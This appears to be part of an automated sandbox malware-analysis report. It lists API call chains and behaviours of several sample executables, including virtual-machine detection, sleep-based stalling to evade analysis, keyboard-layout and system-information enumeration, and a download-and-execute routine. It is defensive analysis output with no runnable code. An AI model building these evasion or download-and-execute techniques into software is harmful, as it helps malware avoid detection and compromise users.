              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Contain functionality to detect virtual machines
              Source: C:\Windows\Temp\ .exeCode function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc. 5_2_00405DB0
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100022F03_2_100022F0
              Contains functionality to detect virtual machines (IN, VMware)
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10001800 in eax, dx3_2_10001800
              Found evasive API chain (may stop execution after checking mutex)
              Source: C:\Windows\Temp\v5.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-1365
              Found stalling execution ending in API Sleep call
              Source: C:\Windows\Temp\server.exeStalling execution: Execution stalls by calling Sleepgraph_3-19524
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
              Source: C:\Windows\Temp\server.exeCode function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,3_2_10010760
              Source: C:\Windows\Temp\v5.exeCode function: 6CFC6DE0,LoadLibraryA,6CFC6DE0,LoadLibraryA,6CFC6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,2_2_00406090
              Source: C:\Windows\Temp\v5.exeCode function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,4_2_00406090
              Source: C:\Windows\Temp\ .exeCode function: GetAdaptersInfo,GetAdaptersInfo,5_2_0042E9F0
              Source: C:\Windows\Temp\ .exeCode function: SetTimer,GetAdaptersInfo,5_2_0042F050
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1005
              Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 496
              Source: C:\Windows\Temp\v5.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-1569
              Source: C:\Windows\Temp\server.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-19546
              Source: C:\Windows\Temp\v5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-1891
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100022F03_2_100022F0
              Source: C:\Windows\Temp\server.exe TID: 7712Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\server.exe TID: 7832Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\server.exe TID: 7804Thread sleep count: 234 > 30Jump to behavior
              Source: C:\Windows\Temp\server.exe TID: 7804Thread sleep time: -117000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\server.exe TID: 7712Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\server.exe TID: 7832Thread sleep time: -1200000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\v5.exe TID: 7880Thread sleep count: 181 > 30Jump to behavior
              Source: C:\Windows\Temp\v5.exe TID: 7880Thread sleep time: -36200s >= -30000sJump to behavior
              Source: C:\Windows\Temp\v5.exe TID: 7972Thread sleep time: -54000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\v5.exe TID: 7880Thread sleep count: 182 > 30Jump to behavior
              Source: C:\Windows\Temp\v5.exe TID: 7880Thread sleep time: -36400s >= -30000sJump to behavior
              Source: C:\Windows\Temp\v5.exe TID: 7940Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040BJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040DJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044BJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043FJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041BJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081DJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041DJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041FJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042AJump to behavior
              Source: C:\Windows\Temp\ .exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name=&quot;user-PC&quot;
              Source: C:\Windows\Temp\server.exeLast function: Thread delayed
              Source: C:\Windows\Temp\server.exeLast function: Thread delayed
              Source: C:\Windows\Temp\v5.exeLast function: Thread delayed
              Source: C:\Windows\Temp\v5.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,3_2_100014B0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,3_2_10008B50
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,3_2_10008520
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,3_2_10008E40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100086F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,3_2_10008F00
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,5_2_0045B051
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,5_2_00405260
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,5_2_00439D40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,3_2_1000AA30
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_00406090 6CFC6DE0,LoadLibraryA,6CFC6DE0,LoadLibraryA,6CFC6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,2_2_00406090
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Windows\Temp\server.exeThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
